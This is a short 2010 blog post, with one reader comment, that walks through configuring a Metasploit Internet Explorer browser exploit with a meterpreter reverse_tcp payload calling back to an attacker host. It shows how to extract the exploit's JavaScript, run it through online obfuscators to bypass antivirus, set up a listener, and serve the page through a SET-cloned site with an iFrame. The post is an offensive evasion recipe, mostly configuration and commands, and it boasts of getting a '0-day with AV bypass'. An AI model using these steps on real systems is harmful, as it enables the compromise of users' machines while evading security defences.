12.03.2010

JavaScript Obfuscation of Metasploit Browser Exploits for AV bypass

1. Configure the desired browser exploit and payload. Example using ms10_xxx_ie_css_clip:

Module options:

   Name        Current Setting  Required  Description
   ----            ---------------     --------  -----------
   SRVHOST     10.20.30.40      yes       The local host to listen on.
   SRVPORT     80                    yes       The local port to listen on.
   SSL             false                 no        Negotiate SSL for incoming connections
   SSLVersion  SSL3                 no        Specify the version of SSL that should be used
   URIPATH     /example          no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, none, process
   LHOST     10.20.30.40     yes       The listen address
   LPORT     443                 yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

2. "exploit" to start the HTTP server (port 80) and payload handler (port 443).
3. WGET the exploit URI using the --user-agent option to specify the user-agent string of the browser you're targeting. Example for IE7 on XP targets:


wget http://10.20.30.40/example --user-agent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; bgft)"

4. View the HTML source and copy all JavaScript between the "script" tags.

5. Feed to a JavaScript obfuscator of your liking. Examples:

http://www.daftlogic.com/projects-online-javascript-obfuscator.htm
http://javascriptcompressor.com
http://dean.edwards.name/weblog/2007/04/packer3

6. Copy obfuscated JS into a new HTML file.
7. Start a new multi/handler to receive the meterpreter_reverse_tcp shell on port 443 (or whatever your payload requires).

8. Serve your newly obfuscated HTML from BT4 through Apache, or clone a site with SET and edit the embedded iFrame tag to point to your HTML file.

Bam. 0-day with AV bypass? Yeah, you're on the pwnie express. :}

Thanks to Will Metcalf for pointing me in the right direction!

References:
http://rules.emergingthreats.net/research/WMetcalf-CVE-2010-3962/
http://relentless-coding.blogspot.com/2010/07/new-javascript-packer-jsidle.html
http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html

1 comment:

c0d3inj3cT said...

Now the option to Obfuscate the JavaScript is included within the exploit module itself.

It is set to true by default.